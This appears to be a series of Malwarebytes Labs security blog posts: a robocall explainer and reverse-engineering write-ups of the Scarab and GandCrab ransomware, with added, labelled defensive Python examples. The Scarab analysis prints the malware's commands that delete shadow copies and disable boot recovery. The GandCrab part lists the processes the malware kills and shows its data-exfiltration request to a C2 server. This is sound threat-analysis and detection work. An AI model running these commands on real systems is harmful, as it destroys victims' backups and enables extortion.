There are already a few signs of desperate, scorched-earth ransomware attack methods, with the so-called “SpriteCoin” hurling malware at victims once they’ve paid to recover their files. Elsewhere, we have ransomware effectively trying to cannibalize each other’s payments. This infighting certainly isn’t a good thing for the victims, especially when their payments are ending up with the wrong malware groups—nobody is getting their files back in that scenario. Stack that alongside the “bad” ransomware not decrypting files, and you have yet another reason why people will, eventually, choose not to pay.

The future may or may not be Bitcoin, but for now, it almost certainly isn’t ransomware. Give it time while the battle to establish exactly what ransomware is about plays out behind the scenes, though. Eventually, the pendulum always swings back.

The post Ransomware’s difficult second album appeared first on Malwarebytes Labs.


Feb 1, 2018

Stop telephoning me-eh-eh-eh-eh: robocalls explained

If you’ve ever answered a call from anyone outside your contact list only to hear a recorded message playing back at you, you have just been robocalled. Unfortunately for American consumers, this happens several times a day, seven days a week. Suffice to say, this is beyond annoying—and it’s getting worse.

In their National Robocall Index, YouMail, a telecommunications service provider, revealed that nearly 10 billion robocalls were made by mid-2016 and predicted a total of 30 billion by the end of that year. Furthermore, YouMail announced that American consumers received a total of 30.5 billion robocalls in 2017.

Are robocalls the same as cold calls?

What spam is to email, robocalls are to telecommunications devices such as home phones, mobile phones, and VoIP landlines. There is usually no real human behind a robocall, only an automated, pre-recorded message—as the name suggests, the calls are placed by computers. Cold calls, warm calls, social calls, and the more personalized, targeted form of cold calling that salespeople now refer to as “smart calls,” on the other hand, all require a live person.

Many types of robocalls are legal, as are emails, SMS/MMS, and phone calls. Unfortunately, they can be abused, too. So how can you tell the good from the bad?

Which are the “good” robocalls?

An example of legitimate robocalls comes from political parties, especially during election season. Their goal is to sway voters to go to another party or solicit donations. They are legally approved by the FCC.

Other examples include robocalls that notify users of canceled flights or airline changes; doctor or dental appointment reminders; class cancellations or school emergencies; and credit card fraud alerts, among others. Robocalls that are made on behalf of non-profit organizations and charities exist as well. But take note: although several of these types are legal, most robocalls are illegal and fraudulent in nature.

Which are the bad robocalls?

Illegal robocalls generally contact recipients with the intention of stealing something from them. And that something might be your contact number, your financial information, or even your identity.

Here’s a rule of thumb: if you receive a call you didn’t consent to, or one that does not contain emergency or critical information, then the robocall can be considered illegal.

Take note of the list of purported sources of robocalls below. Robocalls that claim to come from these organizations certainly do not. You can be sure that they’re always, always a scam:

  • IRS
  • Social Security Services (SSS)
  • Department of Motor Vehicles (DMV)
  • Cruise companies
  • Tech support

A new trend in illegal robocalling involves the use of numbers closely resembling those they are contacting. Ailsa Chang, a correspondent for NPR’s Planet Money podcast, documented her experience with this when she received a call from a number with the same area code and first three digits of her own contact number. This is known as neighbor spoofing.

The psychology behind neighbor spoofing is that recipients are more likely to pick up the call should they see a familiar-looking number because they believe the caller might be someone they know, like a colleague or their child’s school.
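As an added illustration (not code from the original post), here is the kind of heuristic a call-screening app or a home phone system could apply to the neighbor-spoofing pattern just described: an incoming caller ID that shares the recipient’s area code (NPA) and exchange (NXX) but is not in the contact list is treated as a spoofing suspect rather than silently trusted. It assumes North American ten-digit numbers; the recipient number, the contact list, and the incoming caller IDs are constructed for the demo (fictional 555 exchange).

```python
from __future__ import annotations

import re
from collections import Counter
from typing import Optional

# Constructed demo data: the recipient's own number and a small contact list
# stored in normalized ten-digit form. All numbers use the fictional 555 exchange.
MY_NUMBER = "(202) 555-0100"
CONTACTS = {"2025550199", "2025550123"}


def normalize_nanp(number: str) -> Optional[str]:
    """Reduce a formatted NANP number to ten digits; None if it is not one.

    Accepts forms such as '+1 (202) 555-0147', '1-202-555-0147', '2025550147'.
    A blocked, withheld or non-NANP caller ID comes back as None.
    """
    digits = re.sub(r"\D", "", number)
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]  # strip the country code
    return digits if len(digits) == 10 else None


def npa_nxx(ten_digits: str) -> tuple[str, str]:
    """Split a ten-digit number into area code (NPA) and exchange (NXX)."""
    return ten_digits[:3], ten_digits[3:6]


def classify_caller(caller_id: str, my_number: str = MY_NUMBER,
                    contacts: set = CONTACTS) -> str:
    """Classify one incoming caller ID relative to the recipient's number."""
    mine = normalize_nanp(my_number)
    if mine is None:
        raise ValueError("recipient number must be a NANP number")
    caller = normalize_nanp(caller_id)
    if caller is None:
        return "unparseable"             # withheld, international or malformed
    if caller in contacts:
        return "contact"                 # known number: let it ring normally
    if caller == mine:
        return "spoofed-own-number"      # caller ID identical to the recipient's
    if npa_nxx(caller) == npa_nxx(mine):
        return "neighbor-spoof-suspect"  # same NPA-NXX, yet not a contact
    if caller[:3] == mine[:3]:
        return "same-area-code"          # looks local, but a different exchange
    return "other"


def screen_calls(caller_ids: list) -> dict:
    """Tally a batch of caller IDs by class; the app would act on the tally
    (for example, send 'neighbor-spoof-suspect' straight to voicemail)."""
    return dict(Counter(classify_caller(c) for c in caller_ids))
```

The heuristic is deliberately conservative: it never blocks outright, it only routes look-alike numbers to voicemail, which is also the behaviour the BBB and FCC advice later in the post amounts to (let unknown numbers leave a message and call back the legitimate ones).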

In this lucrative underground business, scammers have become more creative, thanks to technology that has made it easier for them to make unwanted calls and more challenging for us to detect and block them accurately.

Are you familiar with email spoofing? Read this to learn more about it.

I just enrolled in the National Do Not Call Registry. I shouldn’t be getting those deceptive robocalls now, right?

While it is true that legal businesses doing robocalls honor the National Do Not Call Registry, your average cybercriminal and scammer does not. In fact, numbers in this registry are no longer immune to those annoying robocalls.

Back in 2003, when the registry was first passed, it was successful in deterring legal businesses from sending out unwanted calls. But things have changed significantly since then. For one thing, the Internet has gained popularity and usage, and the resources needed to make innumerable, inexpensive calls are easy enough to come by. Furthermore, it’s known that the majority of these illegal robocalls originate outside the United States, making them difficult (if not impossible) to stop.

I’ve seen YouTube clips of people messing with phone scammers. Can I do that with these robocallers?

We don’t advise it. In fact, both the Better Business Bureau (BBB) and the FCC highly encourage phone users to never answer calls from numbers you don’t have in your contact list, from anonymous callers, or from numbers you don’t recognize. Doing otherwise can only make matters worse, as robocallers could be flagging your number for activity. For them, getting any response from a number is a sure sign that it’s active. And an active number could be targeted again and again. That said, ignoring such calls is probably the less thrilling yet the best course of action to take.

So what else can we do to mitigate bad robocalls once and for all?

Below are steps one can take to nip robocalling in the bud:

  • Report the call to the FCC, Federal Trade Commission (FTC), and your attorney general. Doing so will help the collective efforts of regulators and phone companies in blocking these numbers.
  • Do not give out your number online or post it publicly in your social media profiles. They will likely be scraped by scammers.
  • Use efficient apps to analyze the kind of call you receive and respond to it accordingly. So far, Nomorobo is (one of) the best in the market, and it won the Robocall Challenge by the FTC several years ago. Other useful apps include Truecaller, YouMail, PrivacyStar, Hiya, and Mr. Number.
  • Go old-school by turning off your landline’s ringer and then feeding the call to an answering machine with a caller ID. You can always return the call if you have determined that the caller is using a legitimate number or has actually left a message worth returning.
  • If you happen to pick up a call from a robocaller, either by accident or just for the heck of it, hang up immediately or don’t answer any question thrown at you. It’s highly likely that it records your voice to use it to authorize the billing of stolen credit cards.
  • Take advantage of added security measures or protocols your voice service providers offer. Late last year, the FCC passed a rule that gives phone companies the power to proactively block numbers that do not or cannot make outgoing calls.

At this time, there’s no one solution for the complicated problem of nasty robocalls; however, consumers can pay it forward, helping those who are less in the know to stave off robocallers who’d like to rob them blind.

The next time you receive an unwanted call, don’t just flare up. Shut them up for good.


The post Stop telephoning me-eh-eh-eh-eh: robocalls explained appeared first on Malwarebytes Labs.


Jan 31, 2018

Scarab ransomware: new variant changes tactics

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and found in the wild. The most widespread versions were distributed via the Necurs botnet and were written in Visual C. However, after unpacking, we found that another variant, discovered in December 2017 and called Scarabey, is distributed somewhat differently and carries different payload code as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey does not appear to be packed in any of the samples we have come across. The malicious code is written in Delphi, without the C++ packaging that Scarab has, and the content and language of the ransom notes differ between the two.

SCARAB ORIGINAL: e8806738a575a6639e7c9aac882374ae
SCARABEY VARIANT: 9a02862ac95345359dfc3dcc93e3c10e

The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Scarab ransom note

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is further evidence that the authors of Scarab are likely Russian speakers who wrote the note in their native language and ran it through a translator before adding it to the Scarab code. It then seems quite likely that, since they decided to target Russians, they released the Scarabey note in their native language to reach more victims.

Different threats

In the original Scarab versions, it warns: The longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

  1. Besides the fact that the volume of data transfer to send up every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold as ransom.
  2. There is no backdoor or remote access code in Scarab or its variants, which makes the threat of deleting files on the victim’s computer impossible.
  3. The decryption process, from our understanding, is that they send you decryption software loaded with the unique key after the ransom is paid. Then you can run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted, as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes user’s files from the computer.

Specifically, in the message, you see the author implying that decryption initially happens server-side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which refer to a decryption program sent to the victim after payment. Decryption software received after payment, loaded with your unique key, decrypts the files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:


[First run check, registry key]

If it is not set (meaning this is the first run), it checks that SEVNZ has not been created yet and executes cmd.exe to copy itself into the user’s roaming AppData directory as sevnz.exe using:

cmd.exe /c copy /y C:\Users\virusLab\Desktop\9a02862ac95345359dfc3dcc93e3c10e.exe "C:\Users\virusLab\AppData\Roaming\sevnz.exe"

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies SEVNZ.EXE does not exist, copies self to SEVNZ.EXE, executes self with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:


Then, it opens the process cmd.exe with command line…

mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('9a02862ac95345359dfc3dcc93e3c10f.exe');close()}catch(e){}},10);"

…which simply waits and deletes itself, since the process can’t delete while running.

Now onto the SEVNZ.exe process:

The process checks to see if it is currently running as sevnz.exe by trying to delete

If it fails, it now knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mshta.exe to execute JavaScript, which waits and then adds the malware to the registry auto-run:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

-----Executes these scripts with mshta.exe:-----
o=new ActiveXObject("WScript.Shell");
o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);
o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);
o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);
o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);
o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
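From the defender’s side, the sequence above (mshta.exe running inline JavaScript, then several recovery-inhibiting commands spawned from it) is what endpoint telemetry should catch before the encryption loop finishes. The Python below is an added example, not code from the post: it runs a handful of command-line rules over constructed Sysmon-style process-creation events (the field names follow Sysmon Event ID 1; the events, PIDs and paths are made up for this demo and only mirror the behaviour described) and escalates when one parent process has tripped several distinct rules.

```python
import re
from collections import defaultdict

# Each rule is (name, pattern over the CommandLine field). Tool names are
# matched with or without ".exe" so "vssadmin" and "vssadmin.exe" both fire.
RULES = [
    ("vssadmin_delete_shadows",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b", re.I)),
    ("wbadmin_delete_systemstate",
     re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+systemstatebackup\b", re.I)),
    ("bcdedit_disable_recovery",
     re.compile(r"\bbcdedit(\.exe)?\b.*\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("mshta_inline_javascript",
     re.compile(r'\bmshta(\.exe)?\b\s+"?javascript:', re.I)),
]

# Constructed events (Sysmon Event ID 1 field names). Lines 2-7 mirror the
# Scarabey chain described above; the last two are benign admin/system noise.
EVENTS = [
    {"pid": 4100, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\sample.exe",
     "CommandLine": r'cmd.exe /c copy /y C:\Users\user\Desktop\sample.exe "C:\Users\user\AppData\Roaming\sevnz.exe"'},
    {"pid": 4120, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\sevnz.exe",
     "CommandLine": 'mshta.exe "javascript:o=new ActiveXObject(\'WScript.Shell\');'
                    'o.Run(\'cmd.exe /c vssadmin Delete Shadows /All /Quiet\',0);close();"'},
    {"pid": 4130, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"},
    {"pid": 4131, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c wmic SHADOWCOPY DELETE"},
    {"pid": 4132, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c vssadmin Delete Shadows /All /Quiet"},
    {"pid": 4133, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c bcdedit /set {default} recoveryenabled No"},
    {"pid": 4134, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": 5000, "Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},          # benign: listing, not deleting
    {"pid": 5001, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def scan(events):
    """Return (rule_name, pid) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["CommandLine"]):
                hits.append((name, ev["pid"]))
    return hits


def rules_by_parent(events):
    """Distinct rule names fired by the children of each parent image."""
    grouped = defaultdict(set)
    for name, pid in scan(events):
        parent = next(ev["ParentImage"] for ev in events if ev["pid"] == pid)
        grouped[parent].add(name)
    return dict(grouped)


def precursor_alerts(events, min_rules=3):
    """Parents whose children tripped at least min_rules distinct rules.

    A single shadow-copy deletion is noisy on admin hosts; several distinct
    recovery-inhibiting commands fanning out from one parent is the
    ransomware-precursor pattern the analysis describes.
    """
    return sorted(parent for parent, names in rules_by_parent(events).items()
                  if len(names) >= min_rules)
```

In production the same rules belong in the EDR or SIEM rule language rather than in a script, and the grouping key would be the parent process GUID plus a short time window rather than the parent image path alone; the point here is that the individual commands are legitimate admin tools, so the detection value is in the combination and the parent.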

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills them. The likely reason is that these processes hold locks on files the ransomware would otherwise want to encrypt; killing them frees the files for encryption. The list of key processes comes from a generated string:


In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:


The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

Recursively goes through all folders and checks to make sure the extension is not .exe or .dll. If okay, it encrypts files and renames them with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function]

Encryption algorithm

We have determined that the encryption algorithm is AES. A 4-byte chunk (0xDEFACE01) is tacked onto the buffer before the actual file data that it reads. This could be a salt, or a joke from the malware author. It then performs some data manipulation operations using generated bytes, which are likely the initialization vector, used to add randomness.


The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-byte (16-character) blocks. This is standard for every variant of AES: it encrypts 16 bytes from the file at a time, which is 128 bits.
  2. What differentiates the versions of AES is the key size and the number of encryption rounds. In this case, it uses 14 rounds, which is standard for AES 256, instead of 10, which is standard for AES 128. The key size is also 256 bits (32 bytes or characters).
  3. The mode is CBC (cipher block chaining). The main indicator for CBC here is that the previous ciphertext block is used to encrypt the next plaintext block. In other words, the previous encrypted block serves as the initialization vector for the next block of data to encrypt.

[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are XORed against the plaintext bytes as an initialization step to add randomness to the result. As you can see from the next image, the output of AES is then copied into the variable that is used at the beginning of the loop to initialize the next plaintext block before performing AES on it. At this point, this should clearly be AES usage, despite not being called via crypto APIs.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]
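To make the chaining pattern the analysis identifies concrete, here is an added Python example (not code from the post and not the malware’s own code) that implements CBC mode over a stand-in block cipher. The block cipher is a small keyed Feistel network built from SHA-256, assumed here only so the example runs without the embedded AES-256 the post describes; what carries over to the real sample is the chaining logic (IV XORed into the first block, then each ciphertext block XORed into the next plaintext block), the prepended 0xDEFACE01 tag (its byte order and the padding scheme are assumptions), and the quick check that separates a chained mode from an unchained one. Keys, IV and file contents are constructed.

```python
import hashlib

BLOCK = 16                                # AES block size: 16 bytes = 128 bits
TAG = (0xDEFACE01).to_bytes(4, "little")  # constant the post reports; byte order assumed


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Round function of the stand-in cipher: keyed SHA-256 truncated to 8 bytes.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in 128-bit block cipher (4-round Feistel). Not AES; only the
    'one block in, one block out' interface matters for the mode below."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def _pad(data: bytes) -> bytes:
    # PKCS#7 padding to a whole number of blocks (assumption: the analysis
    # does not say how the sample pads its last block).
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    """No chaining: identical plaintext blocks give identical ciphertext blocks."""
    return b"".join(block_encrypt(key, data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """The structure the disassembly shows: the IV is XORed into the first
    plaintext block; after that, each ciphertext block is XORed into the next
    plaintext block before the block cipher runs (previous ciphertext as IV)."""
    prev, out = iv, []
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    prev, out = iv, []
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))
        prev = cur
    return b"".join(out)


def encrypt_file_buffer(key: bytes, iv: bytes, contents: bytes) -> bytes:
    """Mirror the layout described: TAG sits in front of the file data before
    the buffer goes through the CBC loop."""
    return cbc_encrypt(key, iv, _pad(TAG + contents))


def decrypt_file_buffer(key: bytes, iv: bytes, blob: bytes) -> bytes:
    plain = _unpad(cbc_decrypt(key, iv, blob))
    if not plain.startswith(TAG):
        raise ValueError("wrong key or IV: tag missing")
    return plain[len(TAG):]


def chaining_evidence(key: bytes, iv: bytes) -> tuple:
    """The quick test an analyst applies to a suspected chained mode: encrypt
    two identical plaintext blocks. Unchained (ECB) output repeats; CBC does not."""
    two_equal_blocks = b"A" * BLOCK * 2
    ecb = ecb_encrypt(key, two_equal_blocks)
    cbc = cbc_encrypt(key, iv, two_equal_blocks)
    return ecb[:BLOCK] == ecb[BLOCK:], cbc[:BLOCK] != cbc[BLOCK:]
```

The same check works on the real sample without touching the cipher: feed a file made of repeated 16-byte blocks through the encryptor under a debugger and see whether the output repeats. Repetition means no chaining; its absence, together with the XOR-with-previous-block pattern in the loop, is the CBC indicator the analysis relies on.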

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrices. Then, a series of data operations is performed against some hardcoded data, together with the encryption key bytes. What you see highlighted below is one set of operations (1 of 4) in a single round; four of these sets make up one encryption round, because the matrix mathematics requires performing the operation for each item in the matrix against each of the others. And as stated earlier, 14 rounds are done in total.

The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the registry value into the raw encryption key. Otherwise, it jumps to the function that generates a new key.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:


Versus the key from the ransom note:


The key used to encrypt changes from file to file, meaning that two files with identical content will differ after encryption. Essentially, there is an initial key, and many sub-keys are derived from it. If a single encryption key were used for all of the files (which has been seen with other ransomware), you would be able to capture memory at any point in the encryption process, save the key, and use it to decrypt all of the files on your hard drive. Unfortunately, because of this key cycling, decryption of Scarab-encrypted files is likely impossible.

After full disk encryption is complete, the ransomware calls a function that enumerates all network folders and drives, for example VMware shared folders, Terminal Services, and network drives. If any are found, it encrypts the files within those folders as well.

Once complete, it opens the encryption message via notepad.exe.


There are a number of articles we’ve come across online stating that Scarabey has the ability to act as a backdoor, allowing remote access, and may also gather sensitive data. From our analysis, we believe this to be untrue. We found no signs of any functionality beyond encrypting files on the user’s computer.

Additionally, there were rumors of Scarab being built off the open-source ransomware project on GitHub called HiddenTear. We have confirmed this to be untrue, both in our own research and with external researchers. It seems to be the industry consensus now that this was mistakenly posted.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.


Jan 30, 2018

GandCrab ransomware distributed by RIG and GrandSoft exploit kits

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.


GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified itself as of late with distinct threads pushing a specific payload. While Seamless is notorious for having switched to International Domain Names (IDNs) containing characters from the Russian alphabet, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and thought to have disappeared. Yet it was discovered that it too was used to redistribute GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab is not demanding payment in the popular Bitcoin currency but rather in a lesser-known cryptocurrency called Dash. This is another sign that threat actors are moving to currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is fairly straightforward to analyze. There were no attempts to obfuscate data or code beyond the first layer of the packer. Everything from the excluded file types to web request variables, URLs, the list of AVs—even the whole ransom message—is in plain text within the data section. On an initial look-through, you can deduce some of the functionality simply by looking at the strings of the binary.

The code flow stays relatively linear, so as far as reverse engineering is concerned, you can analyze it quite accurately even statically in a disassembler. The code is divided into three main segments: initialization, network, and encryption.


After unpacking, GandCrab starts out with a few functions whose task is to set up information to be used later in the code. It queries information about the user and system such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet, querying whether a drive exists and what type it is. If it is a CD-ROM, unknown, or nonexistent, it skips it. If a fixed drive is found, it copies its name to a buffer, followed by a string describing the drive type. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:


It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:


In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

msftesql.exe          sqlagent.exe          sqlbrowser.exe
sqlservr.exe          sqlwriter.exe         oracle.exe
ocssd.exe             dbsnmp.exe            synctime.exe
mydesktopqos.exe      agntsvc.exe           isqlplussvc.exe
xfssvccon.exe         mydesktopservice.exe  ocautoupds.exe
agntsvc.exe           agntsvc.exe           agntsvc.exe
encsvc.exe            firefoxconfig.exe     tbirdconfig.exe
ocomm.exe             mysqld.exe            mysqld-nt.exe
mysqld-opt.exe        dbeng50.exe           sqbcoreservice.exe
excel.exe             infopath.exe          msaccess.exe
mspub.exe             onenote.exe           outlook.exe
powerpnt.exe          steam.exe             thebat.exe
thebat64.exe          thunderbird.exe       visio.exe
winword.exe           wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side and uses the standard Microsoft crypto libraries available using API calls from Advapi32.dll. It calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off by making a GET request to ipv4bot.whatismyipaddress.com that saves the IP address returned and adds to the GET request string, which has been built with the system information.

It continues and takes a binary chunk, which is the RSA public key that was stored earlier in the initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:


It will be tacked onto the existing GET string, which it has been building this whole time. Below is an example of the RSA key generated in binary and its conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:

Which gets converted to:


And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

action=call&ip= 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
[Crypto key base 64 functions]
[Section of code that is adding the encoded keys to the get string under priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.
